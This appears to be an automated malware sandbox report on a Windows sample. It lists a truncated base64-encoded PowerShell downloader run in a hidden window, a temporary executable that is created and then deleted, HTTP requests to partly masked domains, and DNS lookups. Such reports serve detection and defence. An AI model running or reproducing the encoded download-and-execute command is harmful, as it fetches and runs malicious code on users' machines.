Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABHADYAaQBzADMAWgBJAD0AKAAnAHQAbgA5ACcAKwAnAHUAdABtAGsAJwArACcARwAnACkAOwAkAHAAbQBQAGkANwBhAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGEAaQB0AGkAYQBiADYAagA9AC...
Modifies file system
Creates the following files
- %TEMP%\397.exe
Deletes the following files
- %TEMP%\397.exe
Network activity
TCP
HTTP GET requests
- http://du###oalac.com/ESNeSYv
- http://www.du###oalac.com/ESNeSYv
- http://ga#####diasolutions.com/dDYg1QbPhF
- http://www.pa####eixeira.com/Oyr3bbN
- http://pa####eixeira.com/Oyr3bbN
UDP
- DNS ASK ha###hkar.com
- DNS ASK du###oalac.com
- DNS ASK en#####emagazine.com
- DNS ASK ga#####diasolutions.com
- DNS ASK pa####eixeira.com
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABHADYAaQBzADMAWgBJAD0AKAAnAHQAbgA5ACcAKwAnAHUAdABtAGsAJwArACcARwAnACkAOwAkAHAAbQBQAGkANwBhAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGEAaQB0AGkAYQBiADYAagA9AC...' (with hidden window)
